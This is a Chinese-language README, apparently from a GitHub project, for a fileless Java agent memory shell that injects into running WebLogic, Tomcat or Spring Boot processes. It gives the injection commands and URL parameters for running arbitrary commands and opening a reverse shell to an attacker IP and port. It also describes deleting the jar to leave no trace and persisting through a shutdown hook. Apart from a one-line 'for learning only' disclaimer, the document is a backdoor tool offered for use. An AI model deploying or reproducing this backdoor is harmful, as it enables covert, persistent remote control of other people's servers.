Home

Awesome

说明

一个基于javaagent+ASM的无文件落地的javaagent,兼容多种容器(weblogic,Tomcat,Springboot).

inject jdk要求

agent jdk要求

兼容版本

测试平台

使用说明

inject 参数

java -jar inject.jar [your_password]  # 通用运行
java -jar inject.jar -p               # 打印所有运行的java进程名
java -jar inject.jar [your_password] [process_name] # 定向注入到[process_name]

请求参数

任意url?psw =[your_password]&cmd=[your_cmd]  执行任意命令
任意url?psw =[your_password]&ip=[attack_ip]&port=[attack_port] 反弹shell

测试案例

运行java -jar inject-1.0.jar x1001 java 在服务器端可以看到以下,说明注入成功,并删除当前jar包,达到无shell状态: server 访问任意url,带上参数psw=your_password&cmd=your_cmd request 当应用关闭时。攻击jar包自动生成到java虚拟机目录下。 persist 下次启动,自动注入达到持久化的效果。 persist2

经测试,通过kill -9或者强制结束进程杀死容器进程,并不会触发addShutdownHook,也就不会持久化。 网上查询以下几种杀死进程的情况:

更新

2021/06/19

2021/12/02

参考

https://github.com/rebeyond/memShell

声明

本项目仅供学习使用,勿做它用